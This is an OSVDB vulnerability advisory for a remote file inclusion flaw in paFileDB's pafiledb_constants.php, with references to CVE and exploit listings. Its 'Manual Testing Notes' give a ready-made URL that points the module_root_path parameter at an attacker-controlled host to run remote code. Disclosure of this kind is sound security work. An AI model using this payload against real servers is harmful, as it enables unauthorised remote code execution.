paFileDB pafiledb_constants.php module_root_path Variable Remote File Inclusion

2006-05-09T06:32:36
ID OSVDB:25507
Type osvdb
Reporter IR4DEX GROUP(), Darkfire(darkfire@f4kelive.zzn.com)
Modified 2006-05-09T06:32:36

Description

Vulnerability Description

paFileDB contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to includes/pafiledb_constants.php not properly sanitizing user input supplied to the "module_root_path" variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

paFileDB contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to includes/pafiledb_constants.php not properly sanitizing user input supplied to the "module_root_path" variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/[phpBBpath]/[pafiledbpath]/includes/pafiledb_constants.php?module_root_path=http://[attacker]

References:

Vendor URL: http://www.mx-system.com/index.php?page=112 Secunia Advisory ID:20062 Generic Exploit URL: http://milw0rm.com/exploits/1774 FrSIRT Advisory: ADV-2006-1776 CVE-2006-2361 Bugtraq ID: 17930